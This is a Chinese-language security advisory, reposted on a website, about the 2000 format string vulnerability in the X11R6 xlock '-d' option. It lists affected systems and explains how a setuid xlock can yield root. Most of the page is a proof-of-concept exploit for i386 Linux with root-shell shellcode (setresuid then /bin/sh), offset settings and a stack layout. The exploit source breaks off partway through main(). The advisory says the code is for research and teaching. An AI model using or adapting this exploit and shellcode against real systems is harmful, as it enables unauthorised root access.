X11R6 xlock

2008-04-09 04:28:17来源：互联网阅读 ()

X11R6 xlock "-d"参数格式化串漏洞

发布日期：2000-08-18
更新日期：2000-10-26

受影响系统：

XFree86 X11R6 4.0.1
XFree86 X11R6 4.0
XFree86 X11R6 3.3.6
XFree86 X11R6 3.3.5
XFree86 X11R6 3.3.4
XFree86 X11R6 3.3.3
Open Group X 11.0R6.4
Open Group X 11.0R6.3
Open Group X 11.0R6.2
Open Group X 11.0R6.1
Open Group X 11.0R6

- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- Slackware Linux 7.1
- Slackware Linux 7.0

不受影响系统：

Sun Solaris 8.0
Sun Solaris 7.0
Turbo Linux 6.0

描述：

X11R6包中所带的xlock程序存在一个安全漏洞，它的"-d"参数是用来指定哪个显示器需要锁定。
正常格式应该是：
主机名：显示器号码，例如： a.b.com:0
但是，如果提供某些格式化串给"-d"参数的话，将导致攻击者覆盖堆栈中的某些内容.
某些系统的xlock被设置了setuid root位,因此攻击者可能以root权限执行任意代码。

<*来源：bind (bind@subterrain.net) *>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Ben Williams提供了一个测试代码：

/*

Exploit for xlock -d format string bug on i386 Linux.
By Ben Williams 21 Oct 2000.

Works on Slackware 7.1, Redhat 6.2 - did not have setuid though, Mandrake 7.0.
Redhat 6.1 won't work because fprintf segfaults on large precisions.

gcc xlockfmt.c -o xlockfmt
usage: xlockfmt [offset]
Default offset is 48.

Program calcuates all variables such as target return address, shellcode address
and the format string itself. The only thing not calculated is an offset that is
dependant on the version of xlock or how xlock was compiled.
The target address is fprintf()'s saved return address. This equals the value of
openDisplay()'s saved base pointer less offset bytes. Shellcode is appended to
the format string.

Stack picture:
see resource.c, xlock.c

fprintf(stderr, buf) A-48| ret | return address located at A - 48 bytes.
| stderr |
| buf |
error(buf) | bp A | first value printed by format string is A.
| ret |
| buf |
openDisplay(displayp) | buf |
| ? |
| ? |
| ? |
| ? |
| ? |
A| bp | base pointer located at address A.

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <error.h>
#include <errno.h>
#include <sys/stat.h>
#include <unistd.h>

/*
* distance from fprintf's ret to openDisplay's base pointer
* redhat6.2, slackware7.1 = 48
* mandrake7.0 = 60
*/
#define OFFSET 48

#define XLOCK_PATH "/usr/X11R6/bin/xlock"

#define DEBUG 0
#define FMTSIZE 4096
#define CMDSIZE FMTSIZE 100

/* number of words to print off the stack for analysis */
#define BIGBREAKFAST 400

/* xlock drops privs right away so we have to restore them again.
setresuid(0, 0, 0) then execve a shell */
char shellcode[] =
"\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

char *mkfmt(int prebuf,
int breakfast,
unsigned long int location,
unsigned long int value);

int main(int argc, char **argv){
FILE *fp;
char output[65536];
char fmtstr[FMTSIZE];
char command[CMDSIZE];
int i;
char *p;
int prebuf;
int breakfast;
unsigned long int location;
unsigned long int value;
int shellcode_size = sizeof shellcode;
int offset = OFFSET;
struct stat f;

i = stat(XLOCK_PATH, &f);
if (i) error(1, errno, "whereis xlock?");
if (!(f.st_mode & S_IXOTH)) error(1, 0, "executable?");
if (!(f.st_mode & S_ISUID)) error(1, 0, "not setuid");

if (argc > 1) {
offset = atoi(argv[1]);
}

/*
* Setup a format string to analyse the stack.
*/

memset(output, 0, 65536);

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有